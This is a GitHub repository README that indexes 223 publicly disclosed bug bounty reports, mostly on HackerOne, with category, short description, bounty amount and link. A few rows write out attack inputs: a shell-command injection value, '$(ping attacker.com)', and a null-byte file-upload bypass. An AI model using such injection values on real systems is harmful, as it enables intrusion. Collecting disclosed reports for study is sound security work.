├── README.md
├── _config.yml
├── reports.html
└── reports.md
/README.md:
--------------------------------------------------------------------------------
1 | # Public Bug Bounty Reports
2 |
3 | ### Since ~2020
4 |
5 | Open for contributions from others as well, so please send a pull request if you can!
6 |
7 | # Content
8 | ### raw
9 | - [Markdown](https://github.com/pwnpanda/Bug_Bounty_Reports/blob/master/reports.md)
10 | - [HTML](https://github.com/pwnpanda/Bug_Bounty_Reports/blob/master/reports.html)
11 |
12 | ### Rendered
13 | - [Markdown](https://pwnpanda.github.io/Bug_Bounty_Reports/)
14 | - [HTML](https://pwnpanda.github.io/Bug_Bounty_Reports/reports.html)
15 |
16 | \# | Category | Description | Bounty | Program | URL
17 | -- | --- | --- | --- | --- | ---
18 | 1 | IDOR | IDOR for order delivery address | $3000 | Mail.ru | https://hackerone.com/reports/723461
19 | 2 | IDOR | IDOR to change API-key description | $250 | Visma | https://hackerone.com/reports/809967
20 | 3 | SSRF | STUN SSRF | $3500 | Slack | https://hackerone.com/reports/333419
21 | 4 | SQLi | Blind SQLi through GET | $5000 | Mail.ru | https://hackerone.com/reports/786044
22 | 5 | SQLi | Blind SQLi through GET | $5000 | Mail.ru | https://hackerone.com/reports/795291
23 | 6 | SQLi | Blind SQLi through GET | $3000 | Mail.ru | https://hackerone.com/reports/732430
24 | 7 | SQLi | SQLi | $2200 | Mail.ru | https://hackerone.com/reports/738740
25 | 8 | SQLi | Blind Boolean based SQLi through GET | $300 | Mail.ru | https://hackerone.com/reports/398131
26 | 9 | Buffer Overflow | Buffer Overflow | $1750 | Valve | https://hackerone.com/reports/458929
27 | 10 | Buffer Overflow | Buffer Overflow | $10,000 | Valve | https://hackerone.com/reports/542180
28 | 11 | CSRF | CSRF in iOS app | $2940 | Twitter | https://hackerone.com/reports/805073
29 | 12 | Open redirect | Phishing Open Redirect | $560 | Twitter | https://hackerone.com/reports/781673
30 | 13 | DoS | DoS | $560 | Twitter | https://hackerone.com/reports/767458
31 | 14 | DoS | DoS | $560 | Twitter | https://hackerone.com/reports/768677
32 | 15 | Information leak | Private key disclosed | $2000 | Slack | https://hackerone.com/reports/531032
33 | 16 | Request Smuggling | Request Smuggling | $6500 | Slack | https://hackerone.com/reports/737140
34 | 17 | Account Takeover | Brute force account takeover via recovery code | $3000 | Mail.ru | https://hackerone.com/reports/730067
35 | 18 | Information leak | Arbitrary memory leak through API call | $10,000 | Mail.ru | https://hackerone.com/reports/513236
36 | 19 | XSS | Blind Stored XSS | $600 | Mail.ru | https://hackerone.com/reports/659760
37 | 20 | LFI (Information leak) | Local File Inclusion | $4000 | Starbucks | https://hackerone.com/reports/780021
38 | 21 | LFI | Arbitrary file inclusion & execution | $1000 | Valve | https://hackerone.com/reports/508894
39 | 22 | Information leak | Low impact information leak | $500 | HackerOne | https://hackerone.com/reports/826176
40 | 23 | Insufficient security controls | CORS misconfiguration | $1000 | SEMrush | https://hackerone.com/reports/235200
41 | 24 | Logic bug | Domain authority regex logic bug | $6000 | Google | https://bugs.xdavidhu.me/google/2020/03/08/the-unexpected-google-wide-domain-check-bypass/
42 | 25 | Privilege escalation | Abusing backup and restore function to escalate privileges | $1500 | Ubiquiti Inc | https://hackerone.com/reports/329659
43 | 26 | Privilege escalation | Arbitrary file deletion + DLL hijacking leads to privilege escalation during install | $667 | Ubiquiti Inc | https://hackerone.com/reports/530967
44 | 27 | Information leak | Unauthenticated API endpoint leaking holiday schedule of employees in China | $4000 | Starbucks | https://hackerone.com/reports/659248
45 | 28 | Account takeover | Changing URL path from login to new-password allows merging the victim's store into the attacker's account | $7500 | Shopify | https://hackerone.com/reports/796956
46 | 29 | Improper access control | Unauthenticated API allows enumeration of user names & phone numbers | $500 | Razer | https://hackerone.com/reports/752443
47 | 30 | Authentication bypass | Auth bypass allowing access to support tickets | $1500 | Razer | https://hackerone.com/reports/776110
48 | 31 | Privilege escalation | Same as below, but change of email HAS to be completed before receiving the email verification request. Rewarded due to different root cause | $15,000 | Shopify | https://hackerone.com/reports/796808
49 | 32 | Privilege escalation | Take over any Shopify store by registering an email, sending an email verification request, changing the email and confirming the request chain | $15,000 | Shopify | https://hackerone.com/reports/791775
50 | 33 | Command injection | Abusing relative paths to run custom scripts during startup | $750 | Slack | https://hackerone.com/reports/784714
51 | 34 | Authentication bypass | View webcam and run code in context of any webpage in Safari | $75,000 | Apple | https://www.ryanpickren.com/webcam-hacking-overview
52 | 35 | XSS | Stored XSS through chat message | $300 | Vanilla | https://hackerone.com/reports/683792
53 | 36 | IDOR | IDOR allows enumeration of users with connected google analytics or the amount of calendars owned by a single user | $500 | SEMrush | https://hackerone.com/reports/797685
54 | 37 | Logic Error | Negative values accepted for price parameters allowed obtaining goods for free | $2111 | SEMrush | https://hackerone.com/reports/771694
55 | 38 | XSS | Stored XSS in customer chat | $1000 | Shopify | https://hackerone.com/reports/798599
56 | 39 | XSS | XSS through FB Group integration | $500 | Shopify | https://hackerone.com/reports/267570
57 | 40 | SQLi | Error-based SQLi through GET | $1500 | Mail.ru | https://hackerone.com/reports/790005
58 | 41 | SSRF | Blind SSRF | $150 | Mail.ru | https://hackerone.com/reports/120298
59 | 42 | IDOR | Leaking order information due to IDOR (No PII, only bought items) | $150 | Mail.ru | https://hackerone.com/reports/791289
60 | 43 | Code injection | PHP injection through unserialize() leading to code execution | $3000 | Mail.ru | https://hackerone.com/reports/798135
61 | 44 | Subdomain Takeover | Dangling AWS Record allowed zone transfer, leading to access to cookies and CORS, which could facilitate phishing attacks | $500 | Uber | https://hackerone.com/reports/707748
62 | 45 | Logic Error | No validation preventing a user from rating their own trips, meaning drivers could alter their own ratings. | $1500 | Uber | https://hackerone.com/reports/724522
63 | 46 | LFI | Using the PDF generator and an iframe, one could export a PDF with arbitrary file content | $500 | Visma | https://hackerone.com/reports/809819
64 | 47 | XSS | DOM XSS in IE & Edge on main page | $1000 | ForeScout Technologies | https://hackerone.com/reports/704266
65 | 48 | Logic Error | Overwrite data as low privilege user, by renaming existing folder to the name of a folder you do not have access to | $250 | NextCloud | https://hackerone.com/reports/642515
66 | 49 | Improper access control | Unauthenticated API allowed an attacker to change hostname of device | $550 | UniFi Cloud | https://hackerone.com/reports/802079
67 | 50 | SQLi | SQLi through multiple parameters, but in unused service. Data exfiltration possible. | $2000 | Razer | https://hackerone.com/reports/777698
68 | 51 | SQLi | SQLi through get parameter allowed for data exfiltration from Thai users. | $2000 | Razer | https://hackerone.com/reports/768195
69 | 52 | SQLi | SQLi allowing for access to data on Thai server. | $2000 | Razer | https://hackerone.com/reports/781205
70 | 53 | SSRF | SSRF that could have led to compromise of the server and a significant data breach | $2000 | Razer | https://hackerone.com/reports/777664
71 | 54 | Information leak | PHP file with source code exposed. No exploit. | $200 | Razer | https://hackerone.com/reports/819735
72 | 55 | CSRF | CSRF token with 24h lifetime, leading to the possibility of connecting the attacker's PayPal with the victim's Shopify account | $500 | Shopify | https://hackerone.com/reports/807924
73 | 56 | Code Injection | macOS client is vulnerable to a low-privilege attacker injecting code into the application using a dylib. This is due to the Hardened Runtime capability not being set in Xcode | $250 | NextCloud | https://hackerone.com/reports/633266
74 | 57 | Information leak | Cleartext storage of API keys & tokens. Very poorly handled. | $750 | Zenly | https://hackerone.com/reports/753868
75 | 58 | Improper access control | AWS Bucket access key transmitted in cleartext | $300 | BCM Messenger | https://hackerone.com/reports/764243
76 | 59 | Improper access control | Able to add paid function for 14 days for free | $200 | Coda | https://hackerone.com/reports/777942
77 | 60 | XSS | Blind XSS in admin panel through a partner's superuser name | $750 | Mail.ru | https://hackerone.com/reports/746497
78 | 61 | XSS | Blind XSS in admin panel through a partner's superuser name (Same issue, different endpoint) | $750 | Mail.ru | https://hackerone.com/reports/746505
79 | 62 | SSRF | SSRF & Local File Read via photo upload | $6000 | Mail.ru | https://hackerone.com/reports/748128
80 | 63 | SSRF | SSRF & Local File Read via photo retrieving functionality | $6000 | Mail.ru | https://hackerone.com/reports/748069
81 | 64 | SSRF | SSRF & Local File Read via photo editor | $6000 | Mail.ru | https://hackerone.com/reports/748123
82 | 65 | Logic Error | A partner account with manager role could withdraw money from driver's account | $8000 | Mail.ru | https://hackerone.com/reports/751347
83 | 66 | XSS | Reflected XSS through XML Namespace URI | $500 | Mapbox | https://hackerone.com/reports/780277
84 | 67 | Code Injection | HTML Injection for IE only | $500 | Mail.ru | https://hackerone.com/reports/757100
85 | 68 | DoS | Cache poisoning CORS allow origin header | $550 | Automattic | https://hackerone.com/reports/591302
86 | 69 | IDOR | Remote wipe of other users' devices | $500 | Nextcloud | https://hackerone.com/reports/819807
87 | 70 | SSRF | GitLab local instance SSRF bypass through DNS Rebinding in WebHooks | $3500 | GitLab | https://hackerone.com/reports/632101
88 | 71 | LFI | openStream called on java.net.URL allows access to local resources when passing in file:// or jar:// | $1800 | GitHub Security Lab | https://hackerone.com/reports/844327
89 | 72 | Logic Bug | Not checking whether Linux privileges were successfully dropped leads to increased attack surface | $1800 | GitHub Security Lab | https://hackerone.com/reports/845729
90 | 73 | SQLi | Arbitrary SQL queries via DocID parameter of Websocket API | $1800 | GitHub Security Lab | https://hackerone.com/reports/854439
91 | 74 | Logic Bug | Account takeover through link injection in contact form | $1000 | Insolar | https://hackerone.com/reports/786741
92 | 75 | Information leak | Ability to see other shops' product titles, only if they use a particular app and have an attachment | $500 | Shopify | https://hackerone.com/reports/848625
93 | 76 | XSS | Reflected XSS on API Server (No regular users browsing the page) | $250 | Razer | https://hackerone.com/reports/791941
94 | 77 | Brute Force | Counter-specific (?) password was not protected against brute force attacks | $150 | Mail.ru | https://hackerone.com/reports/754536
95 | 78 | Authentication bypass | Knowing the victim's phone number allowed access to partial information about the victim's travel: payment type, profile information, etc. | $8000 | Mail.ru | https://hackerone.com/reports/772118
96 | 79 | Information leak | API endpoint disclosed e-mails of subscribed users | $250 | Mail.ru | https://hackerone.com/reports/703086
97 | 80 | DoS | DoS & Unsafe Object creation through JSON parsing | $500 | Ruby | https://hackerone.com/reports/706934
98 | 81 | Logic Error | Session Expiration is not enforced during signup. Bypass can be done by deleting HTML element blocking progress | $100 | Visma | https://hackerone.com/reports/810400
99 | 82 | Subdomain Takeover | Subdomain takeover due to expired / unclaimed Hubspot instance | $2500 | Roblox | https://hackerone.com/reports/335330
100 | 83 | Information leak | Endpoint vulnerable to Heartbleed | $1500 | Uber | https://hackerone.com/reports/304190
101 | 84 | RCE | LFI through Path Traversal in image-tag in Markdown. Disclosure of local files leads to disclosure of secret, which can be used to achieve RCE through deserialization | $20,000 | GitLab | https://hackerone.com/reports/827052
102 | 85 | Prototype Pollution | Simple prototype pollution due to improper handling of zipObjectDeep | $250 | Node.js Third Party Modules (lodash) | https://hackerone.com/reports/712065
103 | 86 | Information disclosure | Session is not properly invalidated after logging out. When creating a store before upgrading your account, visitors are required to enter a password. This password is disclosed after logging out, when visiting a certain link. | $500 | Shopify | https://hackerone.com/reports/837729
104 | 87 | IDOR | Able to bypass ban restrictions through path normalization. APIs are also unrestricted | $800 | Roblox | https://hackerone.com/reports/703058
105 | 88 | Phishing | Link URL falsification by altering the post message | $250 | Slack | https://hackerone.com/reports/481472
106 | 89 | Information leak | Leaking (unrestricted?) Google API key | $150 | Identify | https://hackerone.com/reports/724039
107 | 90 | Improper access control | Read-only team members can read all properties of webhooks through GraphQL | $0 | HackerOne | https://hackerone.com/reports/818848
108 | 91 | DoS | DoS through sending large message to the server | $500 | Roblox | https://hackerone.com/reports/679907
109 | 92 | IDOR | Access to log files based on IDOR through exposed signature in Razer Pay Android App | $500 | Razer | https://hackerone.com/reports/754044
110 | 93 | Path Traversal | Misconfiguration when handling URI paths allowed for docroot path traversal giving access to non-sensitive data usually not accessible to users | $500 | Starbucks | https://hackerone.com/reports/844067
111 | 94 | Improper Certificate Validation | Client side traffic hijacking allowed for user data interception (Local?) | $750 | Razer | https://hackerone.com/reports/795272
112 | 95 | Improper authorization | The Razer Pay backend server could be exploited to obtain transaction details from another user | $500 | Razer | https://hackerone.com/reports/754339
113 | 96 | SQLi | Razer Pay API was vulnerable to SQLi exposing user information | $2000 | Razer | https://hackerone.com/reports/811111
114 | 97 | Improper authorization | Reverse engineering the Android app allowed for bypassing the signatures in place to prevent parameter tampering, discovering a variety of IDOR issues | $1000 | Razer | https://hackerone.com/reports/753280
115 | 98 | HTTP Response Splitting | Limited CRLF injection allowed for manipulation of cookies | $150 | Mail.ru | https://hackerone.com/reports/838682
116 | 99 | IDOR | Issue with the marketplace due to length restriction in choosing hashing function | $5000 | SEMrush | https://hackerone.com/reports/837400
117 | 100 | SSRF | SSRF & LFI in Site Audit due to lack of connection protocol verification | $2000 | SEMrush | https://hackerone.com/reports/794099
118 | 101 | SSL Downgrade | Possible to temporarily downgrade a victim from HTTPS to HTTP in Firefox. Required victim clicking a link and had a very short timeframe to be successful | $500 | Uber | https://hackerone.com/reports/221955
119 | 102 | XSS | Reflected XSS due to outdated WordPress installation led to exposure of sensitive form data and user data | $4000 | Uber | https://hackerone.com/reports/340431
120 | 103 | Open Redirect | Open redirect in get parameter | $50 | Unikrn | https://hackerone.com/reports/625546
121 | 104 | DoS | Bypassing the character limitation on the 'Moments' feature and creating many of them leads to DoS | $560 | Twitter | https://hackerone.com/reports/819088
122 | 105 | CRLF Injection | CRLF injection in urllib | $1000 | Python (IBB) | https://hackerone.com/reports/590020
123 | 106 | Subdomain Takeover | Out of scope, no impact subdomain takeover of uptimerobot page | $100 | BTFS | https://hackerone.com/reports/824909
124 | 107 | SQLi | Blind Boolean-based SQLi in Razer Gold TH | $1000 | Razer | https://hackerone.com/reports/790914
125 | 108 | SSRF | SSRF allowing port scanning of localhost through host header injection | $300 | TTS Bug Bounty | https://hackerone.com/reports/272095
126 | 109 | Cryptographic Issues | A variety of WPA3 issues related to cryptography and logic | $750 | The Internet | https://hackerone.com/reports/745276
127 | 110 | XSS | Reflected XSS on resources.hackerone.com | $500 | HackerOne | https://hackerone.com/reports/840759
128 | 111 | Information leak | Un-minified JS code disclosed on some pages | $250 | Imgur | https://hackerone.com/reports/845677
129 | 112 | XSS | Self-XSS to normal XSS by bypassing X-Frame-Options to automatically execute JS through loading content through iframes | $250 | Pornhub.com | https://hackerone.com/reports/761904
130 | 113 | IDOR | A partner account could access another partner's driver data through an IDOR | $1500 | Mail.ru | https://hackerone.com/reports/747612
131 | 114 | IDOR | A partner account could access information about other partners through an IDOR | $1500 | Mail.ru | https://hackerone.com/reports/746513
132 | 115 | IDOR | A partner with manager role could take over a driver's account belonging to a different partner | $8000 | Mail.ru | https://hackerone.com/reports/751281
133 | 116 | XSS | Stored XSS in messages to drivers through the operator interface | $500 | Mail.ru | https://hackerone.com/reports/751263
134 | 117 | Code Execution | PHP code execution through image upload functionality | $3000 | Mail.ru | https://hackerone.com/reports/854032
135 | 118 | Improper Access Control | Delete projects from archived companies set to Read-Only. | $100 | Visma | https://hackerone.com/reports/849157
136 | 119 | Information leak | Account takeover due to leaking auth URLs on google & leaking OTP in API response | $500 | Badoo | https://hackerone.com/reports/746186
137 | 120 | XSS | Stored XSS through file upload (.pdf → JS) | $250 | Visma | https://hackerone.com/reports/808862
138 | 121 | Information leak | 404-page leaks all headers | $500 | HackerOne | https://hackerone.com/reports/792998
139 | 122 | CSRF | Friends Only account mode could be toggled through CSRF | $250 | Mail.ru | https://hackerone.com/reports/448928
140 | 123 | Subdomain Takeover | Possible due to wildcard pointing to uberflip domain | $500 | HackerOne | https://hackerone.com/reports/863551
141 | 124 | DoS | Improper error handling leads to DoS and service failure in case of supplying invalid "Redirect_URI" parameter | $1000 | GitLab | https://hackerone.com/reports/702987
142 | 125 | Information leak | Private program invites can disclose emails of any user invited by using username | $7500 | HackerOne | https://hackerone.com/reports/807448
143 | 126 | SSRF | SSRF through notification configuration. Requires admin privileges | $300 | Phabricator | https://hackerone.com/reports/850114
144 | 127 | Improper Access Control | Read-only user without access to payroll, can still access the data by visiting the URL directly | $250 | Visma | https://hackerone.com/reports/838563
145 | 128 | XSS | Code does not sufficiently escape template expressions, allowing for XSS | $500 | Ruby On Rails | https://hackerone.com/reports/474262
146 | 129 | Information leak | Potentially sensitive information leaked through debug interface | $150 | Mail.ru | https://hackerone.com/reports/748925
147 | 130 | Misconfiguration | Network restrictions on admin interface could be bypassed using alternate hostnames | $150 | Mail.ru | https://hackerone.com/reports/749677
148 | 131 | Request Smuggling | Request smuggling poisoning users using Host header injection | $750 | TTS | https://hackerone.com/reports/726773
149 | 132 | Lack of security mechanisms | Lack of user warning when opening potentially dangerous files from the chat window | $250 | Mail.ru | https://hackerone.com/reports/633600
150 | 133 | XSS | Reflected XSS in investor relations website due to unsanitized user input | $350 | Razer | https://hackerone.com/reports/801075
151 | 134 | SQLi | Blind SQLi due to no input sanitization on "Top Up" function in Razer Gold TH service | $1000 | Razer | https://hackerone.com/reports/789259
152 | 135 | Subdomain Takeover | Subdomain takeover | $250 | Razer | https://hackerone.com/reports/810807
153 | 136 | Open redirect | Open redirect in login flow | $150 | TTS | https://hackerone.com/reports/798742
154 | 137 | Race Condition | Race condition in email verification that awards in-game currency, leading to similar impact as payment bypass | $2000 | InnoGames | https://hackerone.com/reports/509629
155 | 138 | Account Takeover | Links on the in-game forum leak the Referer header, which contains the CSRF token. The page also embeds links containing the cookie value. Combining a self-XSS with the CSRF token, you can grab the cookie from the DOM and send it to the attacker, resulting in account takeover | $1100 | InnoGames | https://hackerone.com/reports/604120
156 | 139 | XSS | Reflected XSS due to insufficient input sanitization. Could allow for account takeover or user session manipulation. | $1900 | PayPal | https://hackerone.com/reports/753835
157 | 140 | XSS | Stored XSS through bypass of the file type upload restriction using a null byte. Uploading xx.html%00.pdf containing JS works as a stored XSS when accessed | $250 | Visma | https://hackerone.com/reports/808821
158 | 141 | Improper Authentication | An issue in how Cloudflare's authoritative DNS server processes requests with ":" in it. This allows an attacker to spoof NXDOMAINs within safe zones. | $400 | Open-Xchange | https://hackerone.com/reports/858854
159 | 142 | Improper Access Control | Can reply or delete replies from any users in any public group, without joining said group. (Buddypress) | $225 | WordPress | https://hackerone.com/reports/837256
160 | 143 | Privilege Escalation | Author role has access to edit, trash and add new items within the BuddyPress Emails. | $225 | WordPress | https://hackerone.com/reports/833782
161 | 144 | CSRF | Profile field CSRF allows for deleting any field in BuddyPress | $225 | WordPress | https://hackerone.com/reports/836187
162 | 145 | Privilege Escalation | IDOR + Changing parameter from "Moderator" to "Admin" leads to privilege escalation | $225 | WordPress | https://hackerone.com/reports/837018
163 | 146 | Privilege Escalation | Chaining 5 vulnerabilities leads to root privileges: a symlink attack combined with a race condition leads to executing malicious code | $500 | NordVPN | https://hackerone.com/reports/767647
164 | 147 | XSS | Reflected XSS evading WAF + confirming insufficient fix | $1000 | Glassdoor | https://hackerone.com/reports/846338
165 | 148 | Information leak | New retest functionality discloses existence of private programs through having the tag added to the program description | $500 | HackerOne | https://hackerone.com/reports/871142
166 | 149 | XSS | Outdated PDF.js allows for XSS using CVE-2018-5158 | $100 | Nextcloud | https://hackerone.com/reports/819863
167 | 150 | DoS | DoS due to having a large amount of groups and sending a tampered request (Changed Accept-Encoding & User-Agent) | $500 | HackerOne | https://hackerone.com/reports/861170
168 | 151 | XSS | Stored XSS in user profile | $200 | QIWI | https://hackerone.com/reports/365093
169 | 152 | Logic Bug | Service time expiry validation bypass leads to unlimited use due to bypassing licensing time checks | $400 | NordVPN | https://hackerone.com/reports/865828
170 | 153 | Improper Access Control | Privilege escalation through improper access control on /membership/ endpoint | $500 | Helium | https://hackerone.com/reports/809816
171 | 154 | IDOR | Sending invitations is vulnerable to IDOR, making it possible to invite any account as administrator of an organization by knowing the organization's UUID | $100 | Helium | https://hackerone.com/reports/835005
172 | 155 | Improper Access Control | Docker Registry API v2 exposed over HTTP, allowing dumping & poisoning of Docker images. | $2000 | Semmle | https://hackerone.com/reports/347296
173 | 156 | Code Injection | CodeQL query to detect JNDI injections | $2300 | GitHub | https://hackerone.com/reports/892465
174 | 157 | Information leak | GraphQL query can disclose information about undisclosed reports to the HackerOne program due to the retest feature | $2500 | HackerOne | https://hackerone.com/reports/871749
175 | 158 | Logic Bug | CodeQL query to detect improper URL handling | $1800 | GitHub | https://hackerone.com/reports/891268
176 | 159 | Information leak | CodeQL query to detect Spring Boot actuator endpoints | $1800 | GitHub | https://hackerone.com/reports/891266
177 | 160 | Logic Bug | CodeQL query to detect incorrect conversion between numeric types in Go | $1800 | GitHub | https://hackerone.com/reports/891265
178 | 161 | Improper Access Control | Certain API methods were not properly restricted and leaked statistics about arbitrary domains | $400 | Mail.ru | https://hackerone.com/reports/831663
179 | 162 | Code Injection | Chat command functions like "/calculate 1+1" can be abused with Bash syntax to execute commands, e.g. "/calculate $(ping attacker.com)", leading to arbitrary code execution | $3000 | Nextcloud | https://hackerone.com/reports/851807
180 | 163 | Privilege Escalation | Can invite members to a "clan" even when the user does not have access to that function | $550 | InnoGames | https://hackerone.com/reports/511275
181 | 164 | XSS | AirMax software was vulnerable to reflected XSS on multiple endpoints and parameters | $150 | Ubiquiti inc. | https://hackerone.com/reports/386570
182 | 165 | Privilege Escalation | Changing email parameter allows privilege escalation to admin | $100 | Helium | https://hackerone.com/reports/813159
183 | 166 | Information leak | CodeQL query to detect logging of sensitive data | $500 | GitHub | https://hackerone.com/reports/886287
184 | 167 | CSRF | CSRF is possible in the AirMax software on multiple endpoints, leading to possible firmware downgrade, config modification, file or token exfiltration etc. | $1100 | Ubiquiti inc. | https://hackerone.com/reports/323852
185 | 168 | Account Takeover | No brute-force protection on the SMS verification endpoint led to account takeover | $1700 | Mail.ru | https://hackerone.com/reports/744662
186 | 169 | IDOR | API allowed for leaking information on job seekers / employers through IDOR | $500 | Mail.ru | https://hackerone.com/reports/743687
187 | 170 | XSS | Reflected XSS through URI on 404 page | $300 | Mail.ru | https://hackerone.com/reports/797717
188 | 171 | SSRF | SSRF through using functionality from included library that should be disabled | $10,000 | GitLab | https://hackerone.com/reports/826361
189 | 172 | Information leak | Insufficient verification leads to ability to read sensitive files | $10,000 | GitLab | https://hackerone.com/reports/850447
190 | 173 | Improper Authentication | Could impersonate and answer tickets belonging to other users | $550 | InnoGames | https://hackerone.com/reports/876573
191 | 174 | Subdomain Takeover | Subdomain takeover of iosota.razersynapse.com | $200 | Razer | https://hackerone.com/reports/813313
192 | 175 | XSS | Reflected XSS through cookies on FTP server for Thai employees | $375 | Razer | https://hackerone.com/reports/748217
193 | 176 | XSS | Out of scope DOM XSS leading to impact on account security for in scope asset. Only applicable to IE and Edge. | $750 | Rockstar Games | https://hackerone.com/reports/663312
194 | 177 | SQLi | Search function was crashable disclosing error logs with useful information for other potential attacks. | $250 | Rockstar Games | https://hackerone.com/reports/808832
195 | 178 | Open Redirect | Could potentially leak sensitive tokens through referer header on GTA Online sub-site. | $750 | Rockstar Games | https://hackerone.com/reports/798121
196 | 179 | XSS | DOM XSS in GTA Online feedback endpoint. Other issues with the same root cause were also found on the same site. | $1250 | Rockstar Games | https://hackerone.com/reports/803934
197 | 180 | DoS | In email verification emails, the unique number is assigned sequentially, meaning you can invalidate all future registrations by visiting the following URL. Ex: confirmmail/1/jfaiu -> confirmmail/2/jfaiu | $150 | Vanilla | https://hackerone.com/reports/329209
198 | 181 | Information leak | External images could be referenced in the screenshot utility feature, possibly leading to Facebook OAuth token theft | $500 | Rockstar Games | https://hackerone.com/reports/497655
199 | 182 | XSS | DOM XSS on main page achieved through multiple minor issues, like path traversal and open redirect | $850 | Rockstar Games | https://hackerone.com/reports/475442
200 | 183 | XSS | Stored XSS through demo function in multiple parameters using javascript scheme | $750 | Shopify | https://hackerone.com/reports/439912
201 | 184 | Improper access control | After removing admin access from an account, it can still make changes with admin permissions until logged out. The account can also still make changes to embedded apps, but this is by design. | $1000 | Shopify | https://hackerone.com/reports/273099
202 | 185 | CSRF | Account takeover on Social Club by using CSRF to link an account to the attacker's Facebook account, leading to the ability to log in as the victim | $1000 | Rockstar Games | https://hackerone.com/reports/474833
203 | 186 | XSS | Reflected XSS due to decoding and executing code after the last "/" on GTAOnline/jp. | $750 | Rockstar Games | https://hackerone.com/reports/507494
204 | 187 | Open Redirect | Open Redirect on the support page, impacting the mobile page | $750 | Rockstar games | https://hackerone.com/reports/781718
205 | 188 | XSS | DOM XSS on GTAOnline. Regressed Directory Traversal and new XSS issue | $750 | Rockstar games | https://hackerone.com/reports/479612
206 | 189 | Race Condition (TOCTOU) | Can click the "This Rocks" (like) button any number of times, allowing an attacker to fill up the victim's notification feed | $250 | Rockstar games | https://hackerone.com/reports/474021
207 | 190 | XSS | DOM XSS in the video section of GTAOnline page through returnurl-parameter, only exploitable on non-English versions. | $750 | Rockstar games | https://hackerone.com/reports/505157
208 | 191 | CSRF | CSRF on login page only, due to processing credentials before checking for CSRF protections. This is also only valid when forcing non 4xx responses from the server | $500 | HackerOne | https://hackerone.com/reports/834366
209 | 192 | RCE | RCE through blind SQLi in WHERE clause | $5500 | QIWI | https://hackerone.com/reports/816254
210 | 193 | RCE | RCE through blind SQLi in WHERE clause | $1000 | QIWI | https://hackerone.com/reports/816560
211 | 194 | RCE | RCE through blind SQLi in prepared statement | $1000 | QIWI | https://hackerone.com/reports/816086
212 | 195 | IDOR | Read-only user can change name of device in admin account | $50 | Helium | https://hackerone.com/reports/865115
213 | 196 | Path Traversal | Access to restricted data through path traversal (requires valid authentication cookie) | $4000 | Starbucks | https://hackerone.com/reports/876295
214 | 197 | XSS | Combining two minor harmless injections results in dom based Reflected XSS | $250 | Starbucks | https://hackerone.com/reports/396493
215 | 198 | XSS | Bypass of previous issue by encoding " as %2522 | $250 | Starbucks | https://hackerone.com/reports/252908
216 | 199 | SQLi | Blind, time-based SQLi due to unsafe handling of GET parameter | $15,000 | Mail.ru | https://hackerone.com/reports/868436
217 | 200 | SSRF | Because public key lookups are done over DNS against the sender's own domain, an attacker who controls that domain's DNS records can redirect the lookup and trick the sending server into accessing arbitrary addresses. | $400 | Open-Xchange | https://hackerone.com/reports/792960
218 | 201 | SSRF | Same as #200 but through a different code path. By controlling the DNS records for your own domain, you can redirect the server that fetches your public key into returning data from an internal asset. | $400 | Open-Xchange | https://hackerone.com/reports/792953
219 | 202 | XSS | DOM XSS through XSS payload in UID field of key. Exploited by sending key to the victim, which then imports it. | $500 | Open-Xchange | https://hackerone.com/reports/788691
220 | 203 | Information disclosure | Attacker can leak the OAuth token because redirect\_uri validation did not detect IDN homograph attacks (Unicode character confusion, e.g. é treated as e) | $1000 | SEMrush | https://hackerone.com/reports/861940
221 | 204 | DoS | DoS through no length restriction on the "instruction" field when creating a new program. | $2500 | HackerOne | https://hackerone.com/reports/887321
222 | 205 | CSRF | CSRF token is not checked | $250 | Visma | https://hackerone.com/reports/878443
223 | 206 | Path Traversal | A path traversal attack on the frontend allowed arbitrary API calls against the (internal only) backend. This led to being able to enumerate 100 million real users. | $4000 | Starbucks | https://samcurry.net/hacking-starbucks/
224 | 207 | Privacy Violation | Incorrect use of the Google Advertising ID integration led to a privacy issue | $200 | NordVPN | https://hackerone.com/reports/803941
225 | 208 | Insecure design principles | Shipping the vendor-bundled eval-stdin.php leads to potential RCE | $100 | NextCloud | https://hackerone.com/reports/820146
226 | 209 | CSRF | Lack of CSRF protection when linking a Facebook account with a Social Club account led to potential account takeover. Required preconditions and deception to succeed. | $550 | Rockstar Games | https://hackerone.com/reports/653254
227 | 210 | Information Disclosure | A chain of vulnerabilities leads to being able to exfiltrate user tokens. One part was image injection in the Screenshot-View function. | $500 | Rockstar Games | https://hackerone.com/reports/655288
228 | 211 | Information Disclosure | Image injection in www.rockstargames.com/bully/screens could be combined with other minor issues to leak user tokens. | $500 | Rockstar Games | https://hackerone.com/reports/661646
229 | 212 | XSS | DOM XSS in localized (different languages) Red Dead Redemption 2 video viewer. www.rockstargames.com/reddeadredemption2/br/videos | $750 | Rockstar Games | https://hackerone.com/reports/488108
230 | 213 | CSRF | CSRF issue in language changing function for GTA Online could be chained with other vulnerabilities to leak user tokens. | $500 | Rockstar Games | https://hackerone.com/reports/809691
231 | 214 | Information Disclosure | Image injection on www.rockstargames.com/bully/anniversaryedition. Could be combined with other issues to leak user tokens. | $500 | Rockstar Games | https://hackerone.com/reports/498358
232 | 215 | Information Disclosure | Image injection-fix bypass in the screenshot-viewer utility | $500 | Rockstar Games | https://hackerone.com/reports/505259
233 | 216 | Information Disclosure | Another Image injection-fix bypass in the screenshot-viewer utility | $500 | Rockstar Games | https://hackerone.com/reports/506126
234 | 217 | XSS | Flash file based Open Redirect and XSS vulnerability. | $500 | Rockstar Games | https://hackerone.com/reports/485382
235 | 218 | Open Redirect | Open Redirect in changing language functionality on https://www.rockstargames.com/GTAOnline. This could be used to leak sensitive tokens from the URL through Referer header. | $500 | Rockstar Games | https://hackerone.com/reports/870062
236 | 219 | XSS | Localized (different languages) versions of https://www.rockstargames.com/GTAOnline/ were vulnerable to DOM XSS in various locations. Combined with an Open Redirect, this allowed user token exfiltration. | $750 | Rockstar Games | https://hackerone.com/reports/508517
237 | 220 | Information Disclosure | Image injection on localized (different languages) versions of games/info endpoint (https://www.rockstargames.com/br/#/games/info). This could lead to leaking user tokens through Referer header. | $500 | Rockstar Games | https://hackerone.com/reports/510388
238 | 221 | Information Disclosure | Attack chain leading to leaking OAuth tokens. Image injection in https://www.rockstargames.com/bully/anniversaryedition combined with other minor issues allowed the attack to succeed. | $500 | Rockstar Games | https://hackerone.com/reports/659784
239 | 222 | XSS | DOM XSS in localized versions of GTA Online screenshot site, like the following: https://www.rockstargames.com/GTAOnline/jp/screens/ | $750 | Rockstar Games | https://hackerone.com/reports/508475
240 | 223 | XSS | DOM XSS in www.rockstargames.com/GTAOnline/features/freemode | $750 | Rockstar Games | https://hackerone.com/reports/799739
